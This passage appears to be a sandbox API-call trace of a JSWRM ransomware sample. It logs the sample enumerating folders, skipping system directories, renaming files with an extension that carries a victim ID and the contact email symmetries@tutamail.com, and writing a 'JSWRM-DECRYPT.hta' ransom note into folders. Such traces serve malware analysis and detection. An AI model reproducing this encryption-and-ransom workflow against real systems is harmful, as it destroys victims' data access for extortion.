returned 0xffffffff [0068.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.033] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.033] CloseHandle (hObject=0xffffffff) returned 1 [0068.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0068.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0068.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0068.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0068.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0068.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.034] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0068.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0068.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0068.034] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f359946, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f359946, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f359946, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x24976a, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.034] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.034] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.034] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.034] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.034] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.034] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.034] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.034] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.034] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.034] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0068.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0068.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0068.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0068.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0068.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0068.035] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f359946, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f359946, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f359946, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x24976a, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0068.035] FindClose (in: hFindFile=0x231ec0 | out: hFindFile=0x231ec0) returned 1 [0068.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0068.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0068.036] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0x0, dwReserved1=0x0, cFileName="auxpad.xml", cAlternateFileName="")) returned 1 [0068.036] lstrcmpiW (lpString1="auxpad.xml", lpString2=".") returned 1 [0068.036] lstrcmpiW (lpString1="auxpad.xml", lpString2="..") returned 1 [0068.036] lstrcmpiW (lpString1="auxpad.xml", lpString2="...") returned 1 [0068.036] lstrcmpiW (lpString1="auxpad.xml", lpString2="windows") returned -1 [0068.036] lstrcmpiW (lpString1="auxpad.xml", lpString2="recovery") returned -1 [0068.036] lstrcmpiW (lpString1="auxpad.xml", lpString2="perflogs") returned -1 [0068.036] lstrcmpiW (lpString1="auxpad.xml", lpString2="documents and settings") returned -1 [0068.036] lstrcmpiW (lpString1="auxpad.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.036] lstrcmpiW (lpString1="auxpad.xml", lpString2="system volume information") returned -1 [0068.036] lstrcmpiW (lpString1="auxpad.xml", lpString2="msocache") returned -1 [0068.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0068.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="auxpad.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="auxpad.xml", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="auxpad.xml", lpUsedDefaultChar=0x0) returned 10 [0068.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0068.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="auxpad.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="auxpad.xml", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="auxpad.xml", lpUsedDefaultChar=0x0) returned 10 [0068.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0068.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0068.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0068.036] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.037] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10078089222804448) returned 0 [0068.037] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.038] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.038] CloseHandle (hObject=0xffffffff) returned 1 [0068.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0068.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0068.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0068.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0068.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0068.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0068.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.038] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0068.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0068.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0068.039] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0638c00, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="insert", cAlternateFileName="")) returned 1 [0068.039] lstrcmpiW (lpString1="insert", lpString2=".") returned 1 [0068.039] lstrcmpiW (lpString1="insert", lpString2="..") returned 1 [0068.039] lstrcmpiW (lpString1="insert", lpString2="...") returned 1 [0068.039] lstrcmpiW (lpString1="insert", lpString2="windows") returned -1 [0068.039] lstrcmpiW (lpString1="insert", lpString2="recovery") returned -1 [0068.039] lstrcmpiW (lpString1="insert", lpString2="perflogs") returned -1 [0068.039] lstrcmpiW (lpString1="insert", lpString2="documents and settings") returned 1 [0068.039] lstrcmpiW (lpString1="insert", lpString2="$RECYCLE.BIN") returned 1 [0068.039] lstrcmpiW (lpString1="insert", lpString2="system volume information") returned -1 [0068.039] lstrcmpiW (lpString1="insert", lpString2="msocache") returned -1 [0068.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0068.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0068.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0068.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0068.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0068.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0068.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0068.039] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\jswrm-decrypt.hta")) returned 0xffffffff [0068.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0068.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1e0 [0068.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffb0 [0068.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0068.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0068.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0068.040] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0068.041] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.041] WriteFile (in: hFile=0x458, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0068.042] CloseHandle (hObject=0x458) returned 1 [0068.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0068.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffb0 | out: hHeap=0x1e0000) returned 1 [0068.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0068.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0068.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0068.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0068.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0068.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0068.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0068.043] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\jswrm-decrypt.hta")) returned 0x20 [0068.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0068.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0068.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0068.043] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0638c00, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f37fbb5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231d00 [0068.043] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.043] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0638c00, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f37fbb5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.044] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.044] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.044] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x387, dwReserved0=0x0, dwReserved1=0x0, cFileName="insertbase.xml", cAlternateFileName="")) returned 1 [0068.044] lstrcmpiW (lpString1="insertbase.xml", lpString2=".") returned 1 [0068.044] lstrcmpiW (lpString1="insertbase.xml", lpString2="..") returned 1 [0068.044] lstrcmpiW (lpString1="insertbase.xml", lpString2="...") returned 1 [0068.044] lstrcmpiW (lpString1="insertbase.xml", lpString2="windows") returned -1 [0068.044] lstrcmpiW (lpString1="insertbase.xml", lpString2="recovery") returned -1 [0068.044] lstrcmpiW (lpString1="insertbase.xml", lpString2="perflogs") returned -1 [0068.044] lstrcmpiW (lpString1="insertbase.xml", lpString2="documents and settings") returned 1 [0068.044] lstrcmpiW (lpString1="insertbase.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.044] lstrcmpiW (lpString1="insertbase.xml", lpString2="system volume information") returned -1 [0068.044] lstrcmpiW (lpString1="insertbase.xml", lpString2="msocache") returned -1 [0068.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0068.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="insertbase.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0068.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="insertbase.xml", cchWideChar=14, lpMultiByteStr=0x345e870, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="insertbase.xml", lpUsedDefaultChar=0x0) returned 14 [0068.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0068.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0068.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="insertbase.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0068.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="insertbase.xml", cchWideChar=14, lpMultiByteStr=0x345e840, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="insertbase.xml", lpUsedDefaultChar=0x0) returned 14 [0068.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0068.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0068.044] HeapFree (in: 